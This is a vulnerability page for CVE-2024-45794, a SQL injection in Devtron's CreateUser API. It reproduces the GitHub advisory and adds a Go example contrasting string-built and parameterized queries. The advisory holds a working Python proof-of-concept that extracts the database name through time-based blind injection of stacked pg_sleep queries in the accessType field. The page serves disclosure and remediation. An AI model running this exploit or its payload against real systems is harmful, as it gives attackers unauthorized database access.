
CVE-2024-45794

HIGH
Published 2024-11-07T17:42:58.662Z


CVSS Score

CVSS v3.1 base score: 8.3/10
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L

EPSS Score (model v2025.03.14)

Probability of exploitation in the wild: 0.004. That is, there is a 0.4% chance that this vulnerability will be exploited in the wild within the next 30 days.

Updated: 2025-06-25
Exploit probability percentile: 0.576 (higher than 57.6% of all CVEs)

Attack Vector Metrics

Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED

Impact Metrics

Confidentiality
HIGH
Integrity
HIGH
Availability
LOW

Description

Devtron is an open source tool integration platform for Kubernetes. In affected versions, an authenticated user with only minimum permissions can exploit a SQL injection in the CreateUser API (/orchestrator/user) to execute attacker-controlled SQL queries against the backing database. This issue has been addressed in version 0.7.2 and all users are advised to upgrade. There are no known workarounds for this vulnerability.

Available Exploits

No exploits available for this CVE.

Related News

No news articles found for this CVE.

Affected Products

GitHub Security Advisories

Community-driven vulnerability intelligence from GitHub

✓ GitHub Reviewed HIGH

Devtron has SQL Injection in CreateUser API

GHSA-q78v-cv36-8fxj

Advisory Details

### Summary

An authenticated user (with minimum permissions) can exploit a SQL injection in the CreateUser API (/orchestrator/user) to execute malicious SQL queries.

### Details

The API is CreateUser (/orchestrator/user). The function that reads user input is:

https://github.com/devtron-labs/devtron/blob/4296366ae288f3a67f87e547d2b946acbcd2dd65/api/auth/user/UserRestHandler.go#L96-L104

The userInfo parameter (line 104) is controlled by the user. The SQL injection happens in:

https://github.com/devtron-labs/devtron/blob/4296366ae288f3a67f87e547d2b946acbcd2dd65/pkg/auth/user/repository/UserAuthRepository.go#L1038

The query (line 1038) is built from user-controlled values, so a user can construct and execute a malicious SQL query. The user must be authenticated but needs only minimum permissions:

![image](https://github.com/user-attachments/assets/08ba940e-33a8-408d-9a1e-9cd1504b95c5)

### PoC

The script below demonstrates a blind, time-based SQL injection that retrieves the database name one character at a time. The payload is placed in the accessType field of a roleFilters entry in the CreateUser request body; a pg_sleep(1) delay on the response is the oracle for a correct guess.

```python
import requests
import time
import string
import argparse


def blind(ip, token, query):
    # Single CreateUser request; returns True if the injected query delayed the response.
    url = f"http://{ip}/orchestrator/user"
    headers = {"token": token}
    entity = "chart-group"
    # Close the string literal, stack the attacker query, comment out the rest.
    payload = f"'; {query} --"
    data = {"id": 111, "email_id": "[email protected]", "superAdmin": False,
            "roleFilters": [{"team": "", "environment": "", "action": "",
                             "entity": entity, "accessType": payload}]}
    # Other role filter fields seen in the request body (not needed for the injection):
    # "EntityName": "test", "AccessType": "test", "Cluster": "", "NameSpace": "devtroncd",
    # "Group": "", "Kind": "", "Resource": "", "Workflow": ""
    start = time.time()
    res = requests.post(url, headers=headers, json=data)
    end = time.time()
    # print(res.content)
    if end - start > 1:
        return True
    return False


def main(ip, token):
    chs = string.printable
    result = ""
    is_end = False
    i = 1
    while not is_end:
        is_end = True
        for ch in chs:
            # pg_sleep(1) fires only when the i-th character of the database name matches ch.
            if blind(ip, token, f"select case when substring(datname,{i},1)='{ch}' then pg_sleep(1) else pg_sleep(0) end from pg_database limit 1;"):
                print(ch)
                result += ch
                is_end = False
                break
        i += 1
    print(result)


if __name__ == "__main__":
    argparser = argparse.ArgumentParser()
    argparser.add_argument("--ip", "-i", type=str, help="Target IP")
    argparser.add_argument("--token", "-t", type=str, help="API TOKEN")
    args = argparser.parse_args()
    main(args.ip, args.token)
```

The debugging breakpoint indicated that the malicious SQL query was executed:

![image](https://github.com/user-attachments/assets/c9067360-8fb3-4d64-82e9-3af1e5e60969)

We can see that we can get the database name:

![image](https://github.com/user-attachments/assets/29d5d969-876a-452d-be7f-8984d2a28c25)

### Impact

SQL injection vulnerability. Our tests indicate that the latest version is affected. The reporters are Yuan Luo and Shuai Xiong from Tencent YunDing Security Lab.
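The advisory locates the bug in a query built from user-controlled roleFilters values in UserAuthRepository.go, and the PoC works because a single quote in accessType ends the string literal and a semicolon starts a second, attacker-chosen statement. The Go program below is an added illustration written for this page, not Devtron's code: buildRoleQueryUnsafe is a hypothetical reconstruction of the bug class (table and column names are assumptions), buildRoleQuerySafe shows the parameterized form that removes it, validateRoleFilter adds an allowlist for the enum-like accessType field (the accepted values are assumptions), and hasStackedStatement is a small check that flags the stacked-statement shape the PoC payload produces.

```go
package main

import "fmt"

// RoleFilter mirrors the roleFilters entry the PoC posts to /orchestrator/user.
// The field names follow the advisory's request body; the struct is an assumption.
type RoleFilter struct {
	Team, Environment, Action, Entity, AccessType string
}

// pocPayload is the accessType value the advisory's PoC sends (first character, guess 'd').
const pocPayload = "'; select case when substring(datname,1,1)='d' then pg_sleep(1) else pg_sleep(0) end from pg_database limit 1; --"

// buildRoleQueryUnsafe is a hypothetical reconstruction of the bug class:
// caller-controlled strings are spliced into the SQL text, so a quote in
// accessType closes the literal and everything after it is parsed as SQL.
func buildRoleQueryUnsafe(f RoleFilter) string {
	return "SELECT role FROM roles WHERE team = '" + f.Team +
		"' AND environment = '" + f.Environment +
		"' AND action = '" + f.Action +
		"' AND entity = '" + f.Entity +
		"' AND access_type = '" + f.AccessType + "'"
}

// buildRoleQuerySafe keeps the SQL text constant and passes values as bind
// parameters (Postgres $n placeholders). The database never parses them as
// SQL, so the payload is just an unusual access_type value that matches no row.
func buildRoleQuerySafe(f RoleFilter) (string, []interface{}) {
	const q = "SELECT role FROM roles WHERE team = $1 AND environment = $2 " +
		"AND action = $3 AND entity = $4 AND access_type = $5"
	return q, []interface{}{f.Team, f.Environment, f.Action, f.Entity, f.AccessType}
}

// allowedAccessTypes is an assumed enumeration. Enum-like request fields should
// be checked against an allowlist before reaching the repository layer, as
// defence in depth on top of parameterization.
var allowedAccessTypes = map[string]bool{"": true, "devtron-app": true, "helm-app": true}

func validateRoleFilter(f RoleFilter) error {
	if !allowedAccessTypes[f.AccessType] {
		return fmt.Errorf("accessType %q is not an allowed value", f.AccessType)
	}
	return nil
}

// hasStackedStatement reports whether a ';' occurs outside a single-quoted
// literal, i.e. whether Postgres would run the text as more than one statement.
// It tracks single quotes and stops at a "--" line comment, nothing more.
func hasStackedStatement(sql string) bool {
	inQuote := false
	for i := 0; i < len(sql); i++ {
		c := sql[i]
		switch {
		case inQuote:
			if c == '\'' {
				inQuote = false
			}
		case c == '\'':
			inQuote = true
		case c == '-' && i+1 < len(sql) && sql[i+1] == '-':
			return false // rest of the line is a comment
		case c == ';':
			return true
		}
	}
	return false
}

func main() {
	f := RoleFilter{Entity: "chart-group", AccessType: pocPayload}
	q := buildRoleQueryUnsafe(f)
	fmt.Println("unsafe query:", q)
	fmt.Println("stacked statement in unsafe query:", hasStackedStatement(q))
	safe, args := buildRoleQuerySafe(f)
	fmt.Println("stacked statement in parameterized query:", hasStackedStatement(safe), "bind args:", len(args))
	fmt.Println("allowlist check:", validateRoleFilter(f))
}
```

Running it prints the concatenated query with the attacker's SELECT and pg_sleep embedded after the first semicolon, reports that the parameterized text contains no stacked statement, and rejects the payload at the allowlist. Parameterization is the actual fix; the allowlist is the extra check that would also have stopped this particular payload before it reached the database.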

Affected Packages

Go github.com/devtron-labs/devtron
Affected versions: ≥0, <0.7.2 (fixed in 0.7.2)

CVSS Scoring

CVSS Score

7.5 (as listed by the advisory; note that the vector below computes to 8.3 under the CVSS 3.1 formula, which is the score shown at the top of this page)

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L

Advisory provided by GitHub Security Advisory Database. Published: November 7, 2024, Modified: November 7, 2024

References

Published: 2024-11-07T17:42:58.662Z
Last Modified: 2024-11-07T19:33:42.084Z